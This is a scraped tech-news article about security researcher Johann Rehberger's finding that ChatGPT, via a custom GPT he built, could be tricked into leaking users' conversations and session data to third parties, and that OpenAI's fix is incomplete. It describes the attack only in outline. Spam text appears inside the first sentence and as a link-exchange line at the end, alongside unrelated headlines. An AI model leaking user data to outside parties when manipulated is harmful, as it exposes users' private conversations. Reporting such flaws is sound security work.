We've said it before,sex video tubeand we'll sayit again: Don't input anything into ChatGPT that you don't want unauthorized parties to read.
Since OpenAI released ChatGPT last year, there have been quite a few occasions where flaws in the AI chatbot could've been weaponized or manipulated by bad actors to access sensitive or private data. And this latest example shows that even after a security patch has been released, problems can still persist.
According to a report by Bleeping Computer, OpenAI has recently rolled out a fix for an issue where ChatGPT could leak users' data to unauthorized third parties. This data could include user conversations with ChatGPT and corresponding metadata like a user's ID and session information.
However, according to security researcher Johann Rehberger, who originally discovered the vulnerability and outlined how it worked, there are still gaping security holes in OpenAI's fix. In essence, the security flaw still exists.
Rehberger was able to take advantage of OpenAI's recently released and much-lauded custom GPTsfeature to create his own GPT, which exfiltrated data from ChatGPT. This was a significant finding as custom GPTs are being marketed as AI apps akin to how the iPhone revolutionized mobile applications with the App Store. If Rehberger could create this custom GPT, it seems like bad actors could soon discover the flaw and create custom GPTs to steal data from their targets.
Rehberger says he first contactedOpenAI about the "data exfiltration technique" way back in April. He contacted OpenAI once again in November to report exactly how he was able to create a custom GPT and carry out the process.
On Wednesday, Rehberger posted an updateto his website. OpenAI had patched the leak vulnerability.
"The fix is not perfect, but a step into the right direction," Rehberger explained.
The reason the fix isn't perfect is that ChatGPT is still leaking data through the vulnerability Rehberger discovered. ChatGPT can still be tricked into sending data.
"Some quick tests show that bits of info can steal [sic] leak," Rehberger wrote, further explaining that "it only leaks small amounts this way, is slow and more noticeable to a user." Regardless of the remaining issues, Rehberger said it's a "step in the right direction for sure."
But, the security flaw still remains entirely in the ChatGPT apps for iOS and Android, which have yet to be updated with a fix.
ChatGPT users should remain vigilant when using custom GPTs and should likely pass on these AI apps from unknown third parties.
Topics Artificial Intelligence Cybersecurity ChatGPT OpenAI
(Editor: {typename type="name"/})
OpenAI's Sora review: Marques Brownlee breaks down the AI video model
Ruth Bader Ginsburg's best pop culture moments
Feds: Amazon staffers took bribes to prop up sketchy merchants, products
Ruggable x Jonathan Adler launch: See the new designs
North Korea will soon be off limits to U.S. travelers
Cat with another cat on its face is double adorbs
12 best tweets of the week, including a panda, David Crosby, and an egg
Meta Quest 3S (256GB) deal: Score a free $30 Best Buy gift card
12 best tweets of the week, including a panda, David Crosby, and an egg
接受PR>=1、BR>=1,流量相当,内容相关类链接。